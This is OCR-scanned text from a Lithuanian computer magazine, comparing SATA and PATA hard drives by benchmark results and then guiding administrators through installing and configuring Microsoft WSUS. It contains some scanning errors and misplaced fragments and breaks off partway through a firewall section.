Sąsaja: SATA 

Sukimosi greitis aps/min: 7200 
Spartinančiosios atminties taipa, Mb:8 
Fizinių diskų kiekis: 4. 

Galvučių kiekis: 8 

Gabantai, mm: 147 x 264102 

Masė, kg: 0,7 

Testavimo rezultatai: 

Nuoseklaus skaitymo greitis, MDA:. 
Maksimalus: 71,3 

Vidutinis: 59,9 

Nuoseklaus įrašymo greitis, Mb/s: 
Maksimalus: 70,9 

Vidutinis: 48,1 

Random Access Time. ms: 16.1 
Maksimalus sąsajos greitus, Mb/s: 127,5 
Disk Transfer Rate, Mb/s 

Pradinis greitis: 69700 

Galutinis greitis: 40300 

Maksimali temperatūra, C: 52 

Nepaisant dvigubai didesnės talpos, šis kaupiklis 
iškai nedaug aisilieka nuo ST3200826AS 


Antrasis „Seagate“ pagaminto kaupiklio modelis, kuris nuo ankstesniojo skiriasi 
dvigubai didesne talpa. Kaip žinia, jeigu du kaupikliai pagaminti pagal tą pačią 
technologiją (konkrečiai šnekant, vienodas įrašymo į fizinį diską tankis) ir skiriasi 
tik savo talpa, tai paprastai modelis su mažesne talpa būna daug našesnis. Ne 
išimtis ir Seagate diskų pora, 400 gigabaitų modelis parodė silpnesnį rezultatą, 
tačiau skirtumas buvo minimalus. Jeigu žvilgtelėtume į nuoseklaus skaitymo 
greičio testo rezultatus, tai galėtume pastebėti, kad šis kaupiklis užima antrąją 
vietą (tiek maksimalus, tiek ir vidutinis greitis), o nuoseklaus įrašymo greičio teste 


Seagate ST3400832AS 


pergalę pasidalino kartu su ST3200826A5 (abu parodė absoliučiai vienodą tiek 
maksimalaus, tiek ir Vidutinio įrašymo greičio rezultatą), beje, skirtumas tarp 
antrojo ir trečiojo rezultato (pastarasis priklauso Maxtor 6B300S0) buo 21,2 
megabaitai per sekundę. Disk Transfer Rate įrenginys taip pat tvirai įsitaisė antro- 
Joje vietoje, šiek tiek atsilikdamas nuo ST3200826AS. Trūkumai praktiškai tokie 
pat, kaip ir dviejų šimtų gigabaitų modelyje. Tai patys prasčiausi atsitiktinio priėjimo 
laiko testo rodikliai (paskutinė vieta). Paties karščiausio kaupiklio titulas taip pat 
priklauso būtent šiam modeliui (dėl pačios didžiausios jo talpos). 


Western Digital WD2500JS 


Taipa, Gb: 250 
Sąsaja: SATA 
Sukimosi greitis aps/min: 7200 


Spartinančiosios atminties talpa, Mb:8 


jaritai, mi 
Masė, kg: 0.7 
Testavmo rezultatai 


Nuoseklaus skaitymo gre) 
Maksimalus: 63, 
Vidutinis: 53,0 
Nuoseklaus įrašymo greiūs, Mb/s: 
Maksimalus: 38.8 

Vidutinis: 23,8. 

Random Access Time. ms: 13, 
Maksimalus sąsajos greitis, Mb/s: 128.5 
Disk Transfer Rate, Mb/s 

Pradinis greitis: 61300 

Galutinis greits: 37400 


Maksimali terperatūra, C: 42 


Stern Digtal įrenginys parodė prasčiau- 
sius nuoseklaus skaitymo greičio rezultatus 


250 gigabaitų talpos įrenginius gamina „Western Digital“. Priešingai nei kiti kietieji diskai, kurių korpusai tradiciškai yra 
sidabrinės spakos, šio disko viduriai supakuoti į stilingą juodą korpusą. Šis kietasis diskas pasirodė esąs pats 
šalčiausias iš visų testuojamų (42 laipsniai pagal Ceisijų). Skirtumas tarp pirmosios ir paskutinės vietos siekė 10 
leipsnių! Kaupiklis pasirodė besąs pats greičiausias atsitiktinio priėjimo laiko teste, kur jo rezultatas buvo 13,6 ms. O 
kiti jo testų rezultatai neteikia jokių vilčių. Nuoseklaus skaitymo greičio teste kaupiklis užėmė paskutinę vietą (pats 
prasčiausias rezultatas tiek pagal maksimalų, tiek ir pagal vidutinį greit), šiek tiek nusileisdamas Maxtor 6B300S0, 
toje pačioje vietoje šis įrenginys baigė ir Disk Transfer Rate testą, tiesa, atsilikimas nuo Maxtor čia labiau apčiuopia- 
mas. Šiek tiek geresnė padėtis nuoseklaus įrašymo greičio teste, maksimalus šio Įrenginio greitis šiame teste — 
trečiasis rezultatas, tačiau vidutinis greitis viso labo ketvirtas, o kadangi vidutinio greičio prioritetas aukštesnis, tai 
galutinis įvertinimas už nuoseklaus rašymo greitį pasirodė esąs pats žemiausias. Kaupiklio skleidžiamas triukšmas 
šiek tiek mažesnis, nei kitų. Mes pastebėjome vieną nemalonią ypatybę: darbo metu kaupiklis smaridai vibruoja, 
todėl jeigu tu šį įrenginį korpuse prastai įtvrtinai, tai kietojo disko skleidžiamas triukšmas bus kur kas didesnis. 


TESTAVIME NEDALYVAUJA, PRIDĖTAS TIK GREIČIO SAVYBEMS PALYGINTI 


Maxtor GL200PO 


Talpa, Gb: 200 
Sąsaja: IDE (UDMA133) 

Sukimosi greitis aps/min: 7200 
Spartinančiosios atminties talpa, Mb: 8 
Fizinių diskų kiekis: 

Galvučių kieki 
Gabaritai, mm: 147 x25 x102 
Masė, kg: 0,6 

Teslavimo rezultatai 

Nuoseklaus skaitymo greitis, MD/X: 
Maksimalus: 6, 
53,8 


lymo greitis, Mb/s: 
Maksimalus: 32,8 

Vidutinis: 25 

Random Access Time, ms: 14,9 
Maksimalus sąsajos greitis, Mb/s: 90,6 
Disk Transfer Rale, MB/S 

Pradinis greitis: 65100 

Galuūnis greitis: 36800 
Maksimali temperatūra, C: 47 
Nepaisant „pasenusios“ sąsajos, 
kaupiklis parodė gana padorų greitį 


Pabaigoje mes negalėjome neištestuoti kietojo disko su sena gera PATA sąsa- 
ja. Bandomuoju triušiuku buvo pasirinktas Maxtor GL200PO. Ir kokias gi 
išvadas galima padaryti išanalizavus gautus rezultatus? Išvada bus banali: 
pagal savo pagrindines greičio charakteristikas silpnesnis yra Maxtor GL200PO, 
kuris praktiškai nenusileidžia „Kietam bei šauniam“ Maxtor 68300S0 mode- 


mus Maxtor GL200PO netgi šiak tiek aplenkė Maxtor GR300S0). Ir tik pagal 
maksimalaus sąsajos greičio parodymus kaupiklis su PATA sąsaja kaip rei. 
kiant atsiliko nuo SATA įrenginių (kas nėra keista). Be abejo, jeigu būtų atlik 
tas testas, kuris modeliuotų, pavyzdžiui, smarkiai apkrautą web serverį, tai 
Maxtor 6B300S0 kur kas didesnės spartinančiosios atminties sąskaita ap- 


lenktų Maxtor GL200P0. Beje, jis dėl tos pačios priežasties greičiausiai ap. 
lenktų ir Seagate kaupiklius, tačiau geriausias rezultatas būtų gautas sparti 
nančiosios atminties talpos sąskaita, 0 ne dėl sąsajos efektyvumo ir greičio. 


liui. Nuoseklaus įrašymo greičio, nuoseklaus skaitymo greičio, Disk Transter 
Rate ir atsitiktinio priėjimo laiko testuose atsilikimas buvo minimalus (o pagal 
maksimalaus skaitymo greičio ir pradinio greičio Disk Transier Rate parody- 


[Testinis stendas] 

Ka gi, pagrindinė išvada, kurią galima padaryti remiantis atlikto testo rezultatais — lyginant su PATA kaupikliais, visi Seria/! ATA 
sąsajos greičio privalumai pilnai neatsiskleidžia, kai ši sąsaja naudojama kietiesiems diskams su 7200 apsisukimų per minutę. 
Pagrindinis lėtesnio veikimo faktorius yra mechaninė disko dalis, o daugeliu atvejų gamintojai skirtingiems kaupiklių modeliams 
su PATA ir SATA sąsajomis naudoja vienodas mechanines dalis. Tačiau atsiranda naujų, greitesnių kietųjų diskų, kuriuose Serial 
ATA privalumai pilnai atsiskleidžia, todėl suderinamumas su SATA sąsaja tavo kompiuterio motininėje plokštėje — tai plėtimo 
galimybės garantija. 

Antroji išvada: šiuolaikiniai kietieji diskai ganėtinai apčiuopiamai kaista. Spręsk pats — testavimo metu kaupiklis buvo ne korpuse 
gerai vėdinamoje ir vėsioje patalpoje, tačiau intensyviai dirbant tai netrukdė jam įkaisti iki 50 laipsnių (tai vidutinis rezultatas). 
Uždarame korpuse ir su bloga oro cirkuliacija kaupiklio temperatūra gali viršyti ir 60-70 laipsnių. Tokio diskų veikimo rezultatas — 
sudegusios magnetinių galvučių pozicionavimo valdymo sistemos mikroschemos. Savaime suprantama, visi šiuolaikiniai diskai 
turi apsaugas nuo perkaitimo (apsauga veikia taip: vos tik temperatūra viršija tam tikrą ribinę reikšmę, kaupiklis arba smarkiai 
sulėtina savo darbą, arba pats išsijungia, laukdamas mikroschemos atvėsimo), tačiau kaupiklio eksploatacija ribiniais darbo 
režimais smarkiai sutrumpins jo tarnybos laiką. Būtent todėl mes rekomenduojame su pačiais karščiausiais įrenginiais montuoti 
pasyvaus arba aktyvaus aušinimo sistemas. 

„Redakcijos pasirinkimu“ pripažintas Seagate ST3400832AS, kuris buvo pats talpiausias diskas su geromis greičio charakteristi- 
komis. „Geriausiu pirkiniu“ tapo Western Digital WD 2500JS, mes jį rekomenduojame vėsumos ir tylos mėgėjams, su salyga, jog 
jis bus patikimai sumontuotas kokybiškame korpuse, leisiančiame išvengti vibracijų. 
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Dovanėlė adminui 


PAGALIAU IŠSIPILDĖ ADMINISTRATORIAUS, 
KURIAM TEKO APTARNAUTI DIDELĮ KORPO- 
RATYVINĮ IŠ PAČIŲ ĮVAIRIAUSIŲ MAŠINŲ 
PARKO SUSIDEDANTĮ TINKLĄ, SVAJONĖ. 
KIEKVIENAS ŽINO, KAIP SUDĖTINGA VAR- 
TOTOJUS PRIVERSTI LAIKU Į SAVO KOM- 
PIUTERIUS |DIEGT! ATNAUJINIMUS IR PA- 
TAISYMUS. LABAI DAŽNAI ŠĮ KLAIKIAI BAI- 
SU, NUOBODŲ IR VISIŠKAI NEĮDOMŲ DAR- 
BĄ (SIMPATIŠKOS SEKRETORĖS KOMPIU- 
TERIO TVARKYMAS NESISKAITO) TENKA 
DARYTI PAČIAM. TIKSLIAU ŠNEKANT — TEK- 
DAVO, KADANGI DABAR TAI GALIMA DARY- 
TI AUTOMATIŠKAI! 


Viskas apie WSUS — serverinę „Win- 
dows“ atnaujinimų tarnybą 

[Automatiniai atnaujinimai: būti ar nebūti?] Idiegęs 
Windows namų mašinoje, aš visų pirma atjungiu auto- 
matinius atnaujinimus (Windows Update System). De- 
ja, ši be jokios abejonės naudinga tarnyba tuo pačiu 
nepaprastai ėdri. Ji nė neįtaria, kad didžioji dalis at- 
naujinimų jau senai priglausti mano diske laukia, kada 
bus įdiegti, todėl su pavydėtinu užsispyrimu pradeda 
laužtis į internetą ir siųstis visus prieinamus atnaujini- 
mus. Iš esmės tame nėra nieko fatališko, nebent per- 
žiūrėjęs išeikvoto tinklo srauto statistiką tu eilinį kartą 
prisiminsi dėdę Bilą. Visų reikalingų pataisymų paketų 
ir atnaujinimų įdiegimas rankiniu būdu trunka 10-15 
minučių, tačiau korporatyviniam tinklui tai tikrai ne išei- 
tis. Nė vienas blaivių protu mąstantis adminas neįdie- 
ginės atnaujinimų rankiniu būdu į kiekvieną mašiną, abe- 
jotina ir tai, kad su šia užduotimi susidoros paprasti 
vartotojai. Išeina taip, kad be automatinio atnaujinimo 
tamybos mes niekaip neapseisim. Kita vertus, ĮSivalz- 
duok, kas bus, jeigu Windows Update System pradės 
aktyviai reikštis kiekviename stambaus (nuo 100 darbo 
stočių) korporatyvinio tinklo kompiuteryje? Nesunku su- 
prasti, kad vienas ir tas pats atnaujinimas bus parsiun- 
čiamas keletą dešimčių, šimtus, o gal net tūkstančius 
kartų. O juk vienai ar kitai programinei įrangai skirti at- 
naujinimai, taip pat ir kritiniai, išleidžiami vos ne kiek- 


A“ Windows Server System 


Tai tesiog Windows Servej System logotipas :) 


vieną savaitę... Praktikoje gauname kolosalias tinklo srauto są- 
naudas. Jų būtų galima lengvai išvengti, jeigu tinkle būtų koks 
nors kešuojantis elementas, kuris vieną kartą parsiųstų visą at- 
naujinimų bazę ir po to juos dalintų visoms lokalaus tinklo dar- 


bo stotims. Šio elemento pavadinimas — WSUS (Windows Ser- 
ver Update Service) — serverinė Windows atnaujinimų tamyba. 


[Susipažįstame artimiau] Taigi kam būtent reikalingas WSUS? 
Iš esmės tai yra efektyvaus atnaujinimų platinimo įrankis. skir- 
tas užlopyti tokius „Microsoft“ produktus, kaip Windows XP Pro- 
fessional, Windows 2000, Windows 2000 Server, Office XP, Of- 
fice 2003, SOL Server 2000, MSDE, Exchange Server ir Ex- 
change Server 2003. Greitai šis ir taip nemažas sąrašas smar- 
kiai išsiplės, apie ką byloja gausus pluoštas „Microsoft“ prane- 
Šimų spaudai. 

Sistema veikia pagal kliento-serverio schemą. Serveris platina 
atnaujinimus ir pataisymus, o klientas juos pasiima. Jeigu klien. 
tinė dalis pagal nutylėjimą įmontuota į Windows 2000 (prade- 
dant SP3), Windows XP bei Windows 2003 Server ir vadinasi 
Windows Updates. tai serverinį komponenta, tai yra WSUS, rei- 
kia įdiegti kompiuteryje su Windows 2000 Server (su Service Pack 
4) arba Windows Server 2003 sistema. Po įdiegimo, apie kurį 
mes greitai pakalbėsime išsamiau, WSUS tampa galingu admi- 
nistratoriaus įrankiu, Kurį galima valdyti nuotoliniu būdu per spe- 
cialią web sąsają, prieinamą iš bet kurios Windows sistemos su 
įdiegta Internet Explorer 6.0 arba naujesne naršykle. Deja, prėji- 
mas su kita naršykle arba operacine sistema nėra galimas. 


[Priežastis pamąstymui] Nepai- 
sant anksčiau duotų pažadų, rug: 
sėjį „Microsoft“ pranešė, kad neiš: 
eis konkretaus kritinio Windows pa- 
žeidžiamumo atnaujinimo. Skylei 
priskirtas aukščiausias pavojingumo 
lygis „critical“, t.y. ji potencialiai ga- 
lima panaudoti masiniam mašinų 
nulaužimui. Sukurtas pataisymas 
pasirodė esąs klaidingas, todėl jo 
išleidimas buvo atidėtas neribotam 
laiku!. O juk tokie kreivų programuo- 
tojų rankų sukurti atnaujinimai gali 
patekti ir į Windows Update, todėl 
prieš atnaujinimo įdiegimą visame 
tinkle rekomenduojama jį ištestuoti 
keliose mašinose. O rugpjūti buvo 
išleisti net 6 „Microsoft“ pataisymai, 
vienas kurių užtaisė dar vieną kriti 
nį Windows pažeidžiamumą. 


WSUS pirmtakas buvo 


Stambiems tinklams arba keliems tarpusavyje susijusiems tin- 
klams gali būti naudingas WSUS serverių grandinių palaikymas. 
Vienas iš jų — svarbiausias — prijungtas prie interneto (tiksliau 
šnekant, prisijungęs prie Microsoft Update serviso) ir reguliariai 
iš ten parsiunčia visus prieinamus atnaujinimus. Paprastai kiti 
WSUS serveriai neturi tiesioginio priėjimo prie interneto, tačiau 


jie pagrindinį WSUS serverį panaudoja kaip atnaujinimų šaltinį. 
Tokią hierarchiją rekomenduojama naudoti stambiuose tinkluo- 
se, norint nukrauti naštą nuo pagrindinių lokalaus tinklo srauto 
magistralių. Tiesą sakant, tarp naudojamų WSUS serveriu gali 
net nebūti susijungimo! Visus pagrindiniame serveryje prieina- 
mus atnaujinimus galima įrašyti į kompaktą ir taip atnaujinti 
likusius WSUS. Toks būdas gali būti naudingas, Jeigu tu aptar- 
nauji keletą tinklų, tarp kurių nėra greitaeigio sujungimo 
Prisijungdamas prie WSUS serverio, klientas perduoda infor- 
maciją apie įdiegtus atnaujinimus. Serveris sulygina šiuos duo- 
menis su savo duomenų baze ir perduoda klientui visus jam 
aktualius atnaujinimus. WSUS bazės atnaujinimą galima atlikti 
reguliariai, o šis procesas turi gana daug parametrų. Jei būtina, 
gali būti atnaujinta ir pati automatinių atnaujinimų tarnyba (tiek 
Klientinė, tiek ir serverinė dalis). Taip nutiks tuomet, kai servery= 
je bus prieinamos naujos jų versijos. 

Visa informacija apie atnaujinimus centralizuotai saugoma duo- 
menų bazėje. Tam gali būti panaudota tiek galinga Microsoft 
SOL Server, tiek ir lengvesnė bei nemokama MS SOL Server 
Desktop Engine (sutrumpintai MSDE) 

Dar daugiau, į WSUS sudėtį įtrauktas Microsoft Windows Server 
Desktop Engine |MSWDE), kurį, tiesą sakant, galima naudoti 
tik Windows 2003 Server sistemoje. Duomenų bazėje saugo- 
mas išsamus prieinamų atnaujinimų sąrašas ir aprašymai, WSUS 
konfigai, informacija apie klientų kompiuterių atnaujinimų bū- 
seną, taip pat išsamios ataskaitos apie visos sistemos darba. 


[WSUS įdiegimas] Norint iki galo suvokti visą WSUS technolo- 
gijos lankstumą, siūlau pažiūrėti į veikiančią sistemą — užsisek 


saugos diržus, mes pradedam įdiegimą. Visų pirma reikia pa- 
ruošti tinkama platformą. Kaip jau minėjau, WSUS galima idiegti 
tik serverinėse Windows 2000 ir Windows 2003 sistemose 
išskyrus jų 64 bitų ir Web Edition versijas. Vidutinio lokalaus 


Jėigu tarp WSUS servenų nėra 
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Šviežių atnaujinimų sąrašas 


tinklo iš 500 mašinų aptarnavimui „Microsoft“ inžinieriai reko- 
menduoja panaudoti serverį, turintį ne lėtesnį kaip 1 GHz pro- 
cesorių ir 1 Gb operatyvinės atminties. Pačiai WSUS prireiks 
mažiausiai 1 Gb disko vietos (beje, WSUS distributyvas užima 
tik 130 Mb), taip pat 6 Gb duomenų saugojimui (atnaujinimai, 
pataisymai ir t.t.). Beje, rekomenduojama šiam tikslui skiria- 
mos laisvos disko vietos apimtis — 30 Gb. Tam tikri reikalavi- 
mai taip pat keliami ir operacinėje sistemoje įdiegtai programi- 
nei įrangai. Taigi WSUS įdiegimui ir tolimesniam darbui prireiks: 
4) Microsoft Internet Information Services (IIS) 6.0, kuris grei- 
čiausiai bus įdiegtas kartu su pačiomis langinėmis. 

2) Microsoft .NET Framework 1.1 Service Pack 1 for Windows 
Server 2003. 

3) Background Intelligent Transfer Service (BITS) 2.0. 

Kadangi WSUS aktyviai naudoja duomenų bazę, tai šį sąrašą 
buvo galima papildyti ir DBVS. Tačiau, kaip jau buvo pasakyta, į 
WSUS distributyvą įjungta nemokama WMSDE, kuri visiškai sėk- 
mingai susidoroja su visomis jai skirtomis užduotimis. Tiesa, 
Jos įdiegimui dar prireiks mažiausiai 2 Gb disko vietos. Visus 
šiuos išvardintus dalykus bei WSUS distributyvą galima rasti ofi- 
cialioje WSUS svetainėje — www.microsoft.com/windowsser- 
versystem/updateservices/aownloads. 

Teise idiegti WSUS turi tik lokalios Administrators grupės nariai, 
tai dar vienas svarbus įdiegimo reikalavimas. Dėl to prieš pra- 
dedant įdiegimą į sistemą reikia prisijungti administratoriaus 
—————— 


Pagrindinis WSUS konsolės langas 


vardu. Žemiau aš aptarsiu gana paprastą, tačiau labiausiai pa- 
plitusi ir efektyvų WSUS įdiegimo ir panaudojimo būdą. WSUS 
ir įmontuotos DBVS WMSDE darbą valdys Windows 2003 Ser- 
ver su įdiegtu IIS, o visi atnaujinimai, pataisymai Ir programinė 
įranga bus saugomi Jokaliai, serverio diske. 

Serverio distributyvas platinamas vienintelės vykdomos bylos 
WSUSSetup.exe — pavidalu. Jį paleidęs, tu pamatysi patogų 
įdiegimo vedlį (wizard), kuris vadovaus pirminio serviso įdiegimo 
procesui. Po tradicinio licencinio susitarimo peržiūros vedlys tau 
pasiūlys nurodyti vietą, kurioje WSUS saugos atnaujinimus. Iš 
esmės šio kelio tu gali ir nenurodyti (tam pakanka nuimti vie- 
nintelę šiame lange pateiktą varnelę), tačiau tokiu atveju at- 
naujinimai bus siunčiami iš interneto, kiekvieną kartą pareika- 
lavus vartotojui. Tai ne tik padidins sunaudojamo interneto tin- 
klo srauto kiekį, bet ir smarkiai sumažins atnaujinimo greitį. 
Spręsk pats: atnaujinimai iš lokalaus tinklo būtų parsiųsti kur 
kas greičiau, nei iš interneto. 

Kitame žingsnyje vedlys pasiūlys nurodyti naudojamos DBVS pa- 
rametrus. Pagal nutylėjimą bus įdiegiama įmontuota WMSDE, 
tačiau tai lengvai galima pakeisti. Jeigu serveryje jau įdiegta 
kokia nors DBVS (pavyzdžiui, MS SOL), tai tu gali naudotis bū- 
tent ja, pasirinkdamas atitinkamą specialaus iškrentančio me- 
niu punktą. Kaip ir priklauso bet kuriam padoriam administra- 
toriaus įrankiui, WSUS galima valdyti per web sąsają. 

Visi atnaujinimai ir pataisymai taip pat perduodami HTTP proto- 
kolu (nors ir slaptai nuo vartotojo), todėl jo darbui būtinas IIS. 
Jeigu tu jo nenaudojai, t.y. 80 jungtis laisva, neturėtų kilti jokių 
nesklandumų: tiesiog palik visus nustatymus pagal nutylėjimą ir 
spausk „Next“. Jeigu pas tave jau yra veikianti web svetainė, tai 
WSUS servisai bus sukonfigūruoti veikimui per 8530 jungtį. Šia- 
me lange tu taip pat pamatysi 2 svarbias nuorodas: viena iš jų 
rodo į servisą su atnaujinimais, kita į administratoriaus 5ą- 
sają. Įsidėmėk jas: jų prireiks tolimesniam konfigūravimui. „Mirror 
Update Settings“ parametruose administratoriui siūloma api- 
brėžti įdiegiamo WSUS serverio rolę. Jeizu tai pirmasis tinklo 
WSUS serveris, tai šį etapą galima praleisti. Priešingu atveju 
reikia nurodyti hierarchijoje aukščiau stovinti serveri, L.y. tą, iš 
kurio bus parsiunčiami atnaujinimai. Po to telieka tik keletą 
kartų nuspausti „Next“ ir laukti pirminio idiegimo pabaigos. 


[Tramdome WSUS] Taigi pats paprasčiausias etapas jau praei- 
tas. Dabar reikia sukonfigūruoti klientų mašinas bei patį WSUS, 
kad šis iš interneto teisingai parsiųstų ir išdalintų visus reikia- 
mus atnaujinimus. Servisas valdomas per specialią konsolę, 
kuri gali būti iškviesta per Start -> Programs -> Administrative 
Tools -> Microsoft Windows Server Update Services. Be to, 
prieiti prie konsolės galima ir per atstumą, su naršykle nuėjus 
adresu http://SERVERNAME/WSUSAdmin Išis adresas buvo pa- 
teiktas ekrane įdiegimo metu). Norint ja pasinaudoti, reikia 
būti WSUS kompiuterio „Administrators“ grupės nariu. Tuo pačiu 
priėjimo prie konsolės adresą rekomenduojama įtraukti į in- 
traneto zoną, ką galima padaryti atitinkamuose /nternet Ex- 
plorer nustatymuose (priminsiu, jog jokia kita naršyklė šiuo 
atveju netiks). 
WSUS konsolė iš pradžių gali gąsdinti įvairių skyrelių gausybe, 
tačiau iš tiesų juose nėra nieko baisaus. Pradėsime nuo atnau- 
Jinamų komponentų tipų konfigūravimo, kadangi kiekvienas juos 
pasirenka priklausomai nuo savo poreikių. Tam pereik | Options 
> Synchronization Options. Sinchronizacija — tai naujų at- 


naujinimų, kurie tenkina administratoriaus nurodytus kriterijus, 
paieškos ir parsiuntimo iš „Microsoft“ serverio procesas. Tiesą 
sakant, šiuos kriterijus ir reikia nurodyti. Atsidariusiame lange iš 
pradžių bus atidarytas skyrelis „Schedule“. Sinchronizaciją gali- 
ma atlikinėti arba rankiniu būdu (nuspaudžiant specialų mygtu- 
ką Tasks -> Synchronize now), arba automatiškai. Sistemos 
konfigūravimo ir derinimo etape rekomenduočiau palikti pirmąjį 
variantą. Antrasis skyrelis — „Products and Classifications“ — 
ne mažiau svarbus, kadangi jame nurodomi atnaujinami pro- 
duktai ir jiems skirtų atnaujinamų tipai. Jeigu nuspausi po šio 
skyrelio pavadinimu kairėje esantį mygtuką „Change“, tai gausi 
visų atnaujintinų programinių produktų sąrašą. Pažymėk varne- 
Iėmis tai, kas tave domina (pavyzdžiui, Windows XP, Windows 
2003 Server), ir spausk „Ok“. Norint apibrėžti atnaujinamų mo- 
dulių tipus, reikia nuspausti kitoje lango dalyje, dešinėje, esantį 
mygtuką „Change“. Pagal nutylėjimą WSUS iš „Microsoft“ ser- 
verio užkrauna tik kritinius ir sistemos saugumo atnaujinimus. 
Tau pageidaujant į šį sąrašą gali pakliūti ir tvarkyklės, sukaupti 
atnaujinimų paketai bei naujų funkcijų paketai. 

„Proxy server“ skyrelis reikalingas tuo atveju, kai tinkle yra proxy 
serveris, O visi reikiami „Update Source“ (atnaujinimo šaltinis) 
skyrelio parametrai buvo nurodyti WSUS įdiegimo metu. Mus 
kur kas labiau domina skyrelis „Update Files and Languages“ 
(atnaujinamos bylos ir kalbos). Priminsiu, kad kiekvienai savo 
produktų lokalizacijai „Microsoft“ išleidžia skirtingus atnaujini- 
mus ir pataisymus, kurie kažkodėl tarpusavyje nesuderinami. 
Siųstis absoliučiai visko tikrai nereikia, todėl, nuspaudęs myg- 
tuką „Advanced...“, aš paprastai palieku tik anglų kalbą (įdo- 
mu, ką daryti, jeigu įmonėje yra lietuviški Windows ar Office — 
red.past.). Čia taip pat galima nurodyti keletą kitų opcijų, pa- 
vyzdžiui, atnaujinimų bylų saugojimo vietą. Palik šį parametrą 
kaip yra, kadangi mes jau įdiegimo metu nurodėme, jog visus 
duomenis būtina saugoti kietajame diske. Taip pat svarbi opcija 
„Download update files to this server only when updates are 
approved“ (Atnaujinimų bylas į serverį parsiųsti tik jeigu jos pa- 
tirtintos). Patvirtinti atnaujinimą galima tiek rankiniu (per ati- 


tinkamą WSUS konsolės dialogą), tiek ir automatiniu režimu, 
kuris konfigūruojamas per skyrelį Options - > Automatic Appro- 
val Options. Aktyvavus šią opciją, tau bus suteikta galimybė pa- 
tvirtinti ir parsiųsti tam tikrus specifinius atnaujinimų tipus (pa- 
vyzdžiui, tvarkykles) pusiau automatiniame režime, pasirenkant 
tik tai, ko tau iš tikrųjų reikia. O tie atnaujinimai, kuriems nuro- 
dytas automatinis patvirtinimas (pavyzdžiui, kritiniams pataisy- 
mams), bus persiunčiami automatiškai, be tavo žinios. 

Dabar, kai sinchronizacijos parametrai pilnai sukonfigūruoti, ga- 
lima pradėti į mūsų WSUS serverį siųsti atnaujinimus. Spausk 
mygtuką „Synchronize now“ ir lauk proceso pabaigos. Po susi- 
jungimo WSUS pabandys išsiaiškinti, ar serveryje yra naujų at- 
naujinimų — jų ten tikrai bus, kadangi tai pirmoji mūsų sin- 
chronizacija. Jeigu kai kuriems atnaujinimų tipams tu nurodei 
automatinį atnaujinimą, tai iš karto prasidės siuntimo proce- 
sas. Visi likusieji atnaujinimai taip pat bus parsiųsti, tačiau tik 
po to, kai administratorius lieps tai padaryti. Pasibaigus sin- 
chronizacijai WSUS konsolėje būtinai atidaryk skyrelį „Updates“, 
kur tu pamatysi visų prieinamų atnaujinimų sąrašą. 


[Grupinės politikos] WSUS aktyviai naudoja grupinės politi- 
kas (group policy) ir, priklausomai nuo vienos ar kitos grupės 
nustatymų, atitinkamai aptarnauja joms priklausančius klien- 
tus. WSUS dokumentacijoje „Microsoft“ specialistai rekomen- 
duoja sukurti mažiausiai dvi grupes: testinę ir pagrindinę. Te- 
stinės grupės nariams (pageidautina, kad tai būtų patyrę var- 
totojai) prieinami absoliučiai visi atnaujinimai, kurie įdiegiami 
jų mašinose vos tik jiems atsiradus WSUS serveryje. Iš esmės 
šie vartotojai tampa bandomaisiais triušiukais — ant jų tu iš- 
bandai išleistų atnaujinimų stabilumą. Jeigu po įdiegimo ne- 
nutiko nieko baisaus, atnaujinimus galima leisti pasiimti pa- 
grindinės grupės vartotojams. Tačiau jeigu nutiks taip, kad „Mic- 
rosoft“ padarys klaidą ir išleis atnaujinimą su klaidomis, tai 
problemų iškils tik testinei grupei, o pagrindinė kompiuterių 
dalis kaip ir toliau sėkmingai veiks. 

Grupių organizavimo procesas vyksta dviem etapais. Visu pir- 
ma, reikia nurodyti, kaip kompiuteriai bus 
išskirstyti į grupes. Čia yra dvi galimybės: ar- 
ba tu kiekvieną kompiuteri pridėsi prie gru- 
pės rankiniu būdu WSUS konsolės priemo- 


Automatino atnaujinimo nustatymai: tegu tai bus daroma 3 valandą nakties 


nėmis (Ly. serverio pusėje), arba klientai au- 
tomatiškai paklius į reikiamą grupę, priklau- 
somai nuo savo grupinės politikos arba nuo 
Windows sisteminio registro nustatymų (t.y. 
priklausomybė grupei nustatoma kliento pu- 
sėje). Antra, reikia sukurti pačias grupes. Vi- 
dutinio dydžio lokaliame tinkle kompiuterius 
pakankamai lengva išrūšiuoti į grupes ran- 
kiniu būdu, todėl šis būdas naudojamas pa- 
gal nutylėjimą. Tuo lengva įsitikinti nuspau- 
dus mygtuką „Options“ ir pasirinkus „Com- 
puter Options“. Atsidariusiame lange turi būti 
aktyvi opcija „Use the Move computers task 
in Windows Server Update Services“. 

Šiaip jau grupių sukūrimas — gana paprasta 
užduotis. Viršutiniame meniu nuspausk 
mygtuką „Computers“, po to — „Create a 
computer group“, ir įvesk grupės pavadini- 
mą. Tarkim, mes sukuriame testinę grupę 
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date Services Setup Wizard 


Ready to Install Windows Update Services 


Windows Update Services is mad to be inataled vln ne fokowing configuratior: 
+ Content der: =-WUSupdatesNWusContent 


-Dalabase lies: c WUSdalsbasėx 
„Adminiairation ste: te: //DC1-8530/Vuzkcimin 


The loloming companenis wlbe instaled along Wh Windows Update Services: 


= Miaosolt SOL Server 2000 Desktop Engine(vindows) 
„ASP NET 1.1 


To irutal, click Next To teview or change settings, chck Back. 


«Bak [TN] Tanos 


Jeigu tinkle naudojama keletas WSUS serverių, reikia sukanfigūruoti jų bendravimo parametrus: 


(nors tai nesvarbu), todėl pavadinkime ją Test. Vienintelė pro- 
blema - į grupę kol kas nėra ką įtraukti, kadangi „Kompiute 
rių“ sąrašas tuščias. Tai Visiškai logiška, kadangi paprasti tin- 
klo kompiuteriai kol kas nežino apie lokalų WSUS serverį ir, 
atitinkamai, į jį nesikreipia. Vadinasi, šią problemėlę reikia 
pataisyti :) 

Automatinių atnaujinimų tarnybos konfigūravimo būdas darbo 
stotyse priklauso nuo tinklo konfigūracijos. Active Directory ap- 
linkoje (t.y. lokaliame tinkle su realizuota katalogu tarnyba) 
galima sukonfigūruoti visus kompiuterius iš karto, pasinaudo- 
jant tik grupinės politikos objektais (Group Policy Objects, GPO). 
Tokiu atveju „Microsoft“ rekomenduoja sukurti naują GPO, ku- 
riame bus išimtinai vien tik darbo su WSUS serveriu nustaty- 
mai, po ko šią politiką reikia susieti su reikiamu konteineriu 
(dažniausiai — domenu). Išsamiau apie tai galima paskaityti 


ĮPasirūpink ugniasiene] 

Bet kuris protingas adminas tarp lokalaus tinklo ir interneto 
pastato ugniasienę. Siekiant išvengti problemų reikia pasi- 
stengti, kad įdiegtai WSUS tarnybai nebūtų blokuojamas pri- 
